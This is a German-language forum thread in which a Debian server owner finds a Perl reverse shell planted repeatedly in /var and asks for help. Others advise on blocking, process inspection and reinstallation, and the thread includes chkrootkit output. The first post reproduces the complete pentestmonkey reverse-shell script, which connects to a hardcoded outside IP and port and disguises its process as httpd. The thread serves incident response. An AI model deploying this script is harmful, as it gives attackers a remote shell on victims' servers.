#1 3. Mai 2009 Ich habe eben im verzeichnis /var hunderte datein gefunden in der immer volgender inhalt steht: Code: #!/usr/bin/perl -w # perl-reverse-shell - A Reverse Shell implementation in PERL # Copyright (C) 2006 pentestmonkey@pentestmonkey.net # # This tool may be used for legal purposes only. Users take full responsibility # for any actions performed using this tool. The author accepts no liability # for damage caused by this tool. If these terms are not acceptable to you, then # do not use this tool. # # In all other respects the GPL version 2 applies: # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # This tool may be used for legal purposes only. Users take full responsibility # for any actions performed using this tool. If these terms are not acceptable to # you, then do not use this tool. # # You are encouraged to send comments, improvements or suggestions to # me at pentestmonkey@pentestmonkey.net # # Description # ----------- # This script will make an outbound TCP connection to a hardcoded IP and port. # The recipient will be given a shell running as the current user (apache normally). # use strict; use Socket; use FileHandle; use POSIX; my $VERSION = "1.0"; # Where to send the reverse shell. Change these. 
my $ip = '193.109.140.132'; my $port = 3137; # Options my $daemon = 1; my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell my $authorised_client_pattern = qr(^127\.0\.0\.1$); # Declarations my $global_page = ""; my $fake_process_name = "/usr/sbin/apache"; # Change the process name to be less conspicious $0 = "[httpd]"; # Authenticate based on source IP address if required if (defined($ENV{'REMOTE_ADDR'})) { cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); if ($auth) { unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { cgiprint("ERROR: Your client isn't authorised to view this page"); cgiexit(); } } } elsif ($auth) { cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); cgiexit(0); } # Background and dissociate from parent process if required if ($daemon) { my $pid = fork(); if ($pid) { cgiexit(0); # parent exits } setsid(); chdir('/'); umask(0); } # Make TCP connection for reverse shell socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { cgiprint("Sent reverse shell to $ip:$port"); cgiprintpage(); } else { cgiprint("Couldn't open reverse shell to $ip:$port: $!"); cgiexit(); } # Redirect STDIN, STDOUT and STDERR to the TCP connection open(STDIN, ">&SOCK"); open(STDOUT,">&SOCK"); open(STDERR,">&SOCK"); $ENV{'HISTFILE'} = '/dev/null'; system("w;uname -a;id;pwd;echo Welcome"); exec({"/bin/sh"} ($fake_process_name, "-i")); # Wrapper around print sub cgiprint { my $line = shift; $line .= "<p>\n"; $global_page .= $line; } # Wrapper around exit sub cgiexit { cgiprintpage(); exit 0; # 0 to ensure we don't give a 500 response. } # Form HTTP response using all the messages gathered by cgiprint so far sub cgiprintpage { print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page; } Ich hab als OS Debian. 
Was hat das zu bedeuten – hat wirklich jemand Zugang zu meinem Server? Falls ja, was kann ich jetzt Sinnvolles tun? Löschen bringt nichts, da alle paar Sekunden neue Dateien mit demselben Inhalt geschrieben werden.
#2 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Block doch erst einmal die IP "193.109.140.132" per iptables. Beachte dabei: Das Skript baut die Verbindung selbst von deinem Server aus auf (connect() nach 193.109.140.132:3137), die Regel muss also in der OUTPUT-Chain stehen – ein DROP in der INPUT-Chain greift dafür nicht. Das unterbindet außerdem nur die Rückverbindung, nicht den Prozess, der die Dateien anlegt.
#3 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Auf die Idee bin ich auch gekommen und hab das gerade gemacht, aber es werden immer noch Dateien "prs2.pl.X" erstellt, wobei X ein Zähler ist. Code: node12126:/var# ls -la total 96 drwxr-xr-x 17 root root 28672 May 3 15:24 . drwxr-xr-x 21 root root 4096 Apr 30 05:18 .. drwxr-xr-x 2 root root 4096 May 3 06:28 backups drwxr-xr-x 10 root root 4096 Apr 25 02:14 cache drwxr-xr-x 8 drweb drweb 4096 Apr 24 09:04 drweb drwxr-xr-x 30 root root 4096 May 3 02:31 lib drwxrwsr-x 2 root staff 4096 Oct 28 2006 local drwxrwxrwt 5 root root 4096 May 3 02:25 lock drwxr-xr-x 11 root root 4096 May 3 06:47 log drwxrwsr-x 2 root mail 4096 Apr 23 23:23 mail drwxr-xr-x 3 root root 4096 Apr 24 09:04 named drwxr-xr-x 2 root root 4096 Apr 23 23:23 opt [COLOR=Red][B]-rw-r--r-- 1 root root 3731 Apr 8 14:21 prs2.pl[/B][/COLOR] drwxr-xr-x 11 root root 4096 Apr 24 09:04 qmail drwxr-xr-x 11 root root 4096 May 3 12:46 run drwxr-xr-x 4 root root 4096 Apr 24 09:04 spool drwxrwxrwt 2 root root 4096 Apr 28 23:06 tmp drwxr-xr-x 5 root root 4096 Apr 24 09:04 www Gibt es eine Möglichkeit herauszufinden, wie die Datei erstellt wurde? Die IP hab ich jetzt gesperrt (bisher nur in der INPUT-Chain). Code: node12126:/var# iptables -L INPUT Chain INPUT (policy ACCEPT) target prot opt source destination DROP 0 -- 193.109.140.132 anywhere
#4 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Die Datei gehört root und liegt direkt in /var – sie wurde also offensichtlich mit Root-Rechten angelegt. Wie genau der Einbruch passiert ist, lässt sich daraus allein nicht sagen. Welche Distribution nutzt du? Das Skript sieht ein bisschen nach Debian/Ubuntu aus. Beende mal deinen Apache (/etc/init.d/apache stop) und schau, ob weiterhin ein Prozess mit dem Namen [httpd] bzw. apache läuft – das Skript setzt $0 = "[httpd]", um sich als Apache zu tarnen. Falls ja, ist das der Prozess der Reverse Shell. Falls nicht, prüfe mit netstat -apn, ob eine Verbindung zu Port 3137 offen ist und von welchem Prozess sie erzeugt wurde.
#5 3. Mai 2009 AW: Auf meinem Rootserver ist eine reverse shell! Ja es ist Debian. Es liefen noch httpd prozesse, diese hab ich gekillt und nach ca 1 - 3 Sekunden starten die prozesse neu. Code: tcp 0 1 85.xx.xx.xx:46182 193.109.140.132:3137 SYN_SENT 13068/[httpd] tcp 0 1 85.xx.xx.xx:46186 193.109.140.132:3137 SYN_SENT 13118/[httpd] tcp 0 1 85.xx.xx.xx:46184 193.109.140.132:3137 SYN_SENT 13093/[httpd] Ich hab jetzt chkrootkit installiert und ausgeführt. Weiß jetzt aber nicht wie ich weiter vorgehen soll. Code: node12126:~/bin/chkrootkit-0.48# ./chkrootkit ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not found Checking `su'... not infected Checking `ifconfig'... [COLOR="Red"]INFECTED[/COLOR] Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... not infected Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not found Checking `mail'... not infected Checking `mingetty'... not found Checking `netstat'... [COLOR="Red"]INFECTED[/COLOR] Checking `named'... not infected Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... [COLOR="Red"]INFECTED[/COLOR] Checking `rpcinfo'... not infected Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... 
not infected Checking `sendmail'... not infected Checking `sshd'... not infected Checking `syslogd'... not infected Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... [COLOR="Red"]INFECTED[/COLOR] Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not infected Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... no suspect files Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... [COLOR="Red"]Possible t0rn v8 \(or variation\) rootkit installed[/COLOR] Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... /lib/init/rw/.ramfs Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... [COLOR="Red"]Warning: Possible Showtee Rootkit installed[/COLOR] Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for LOC rootkit... nothing found Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h Searching for ****it rootkit... 
nothing found Searching for Volc rootkit... nothing found Searching for Gold2 rootkit... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... nothing found Searching for AjaKit rootkit default files and dirs... nothing found Searching for zaRwT rootkit default files and dirs... nothing found Searching for Madalin rootkit default files... nothing found Searching for Fu rootkit default files... nothing found Searching for ESRK rootkit default files... nothing found Searching for rootedoor... nothing found Searching for ENYELKM rootkit default files... nothing found Searching for common ssh-scanners default files... nothing found Searching for suspect PHP files... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... [COLOR="Red"]INFECTED (PORTS: 465)[/COLOR] Checking `lkm'... You have 20 process hidden for readdir command You have 628 process hidden for ps command chkproc: [COLOR="Red"]Warning: Possible LKM Trojan installed[/COLOR] chkdirs: nothing detected Checking `rexedcs'... not found Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets Checking `w55808'... not infected Checking `wted'... chkwtmp: nothing deleted Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... chklastlog: nothing deleted Checking `chkutmp'... chkutmp: nothing deleted node12126:~/bin/chkrootkit-0.48#
#6 24. Juni 2009 AW: Auf meinem Rootserver ist eine reverse shell! Sichere deine Daten und installiere das System neu (aktuelles Debian 5.0.1). Bei trojanisierten Binaries (ifconfig, netstat, pstree, top) und dem LKM-Verdacht aus chkrootkit ist dem laufenden System – und damit auch seiner Ausgabe von ps, netstat & Co. – nichts mehr zu trauen. Sichere nur Nutzdaten, keine Binaries oder Skripte, und prüfe vorher die Logs darauf, wie der Einbruch passiert ist, sonst steht der neue Server gleich wieder offen. Dann Server absichern und die Backups wieder einspielen. EDIT: ah sorry ^^ Datum nicht gesehen ^^